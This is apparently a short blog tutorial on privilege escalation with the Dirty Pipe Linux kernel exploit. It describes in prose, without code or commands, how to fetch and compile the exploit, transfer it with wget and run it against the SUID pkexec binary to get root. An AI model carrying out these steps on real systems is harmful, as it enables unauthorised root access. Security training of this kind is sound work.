May 9, 2022
In this tutorial, we will see how to perform a privilege escalation attack using the Dirty Pipe exploit. Dirty Pipe takes advantage of a vulnerability in the Linux kernel which allows overwriting data in the arbitary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.
This page contains more information about the Dirty Pipe exploit.
The following screenshots from GitHub shows some information about the Dirty Pipe exploit.
Let's download the exploit from GitHub.
It compiles the exploit code into a Linux executable which we will upload to the target.
wget downloads the file from the local box. We have to set the executable bit as well.
The file has been retrieved from the Python web server.
This exploit requires a binary that has the SUID bit set. We can see that the pkexec binary meets the criteria.
Executing the exploit with the binary that has the SUID bit set will give us root access to the box.
If you liked reading this article, you can follow me on Twitter: 0xmaCyberSec.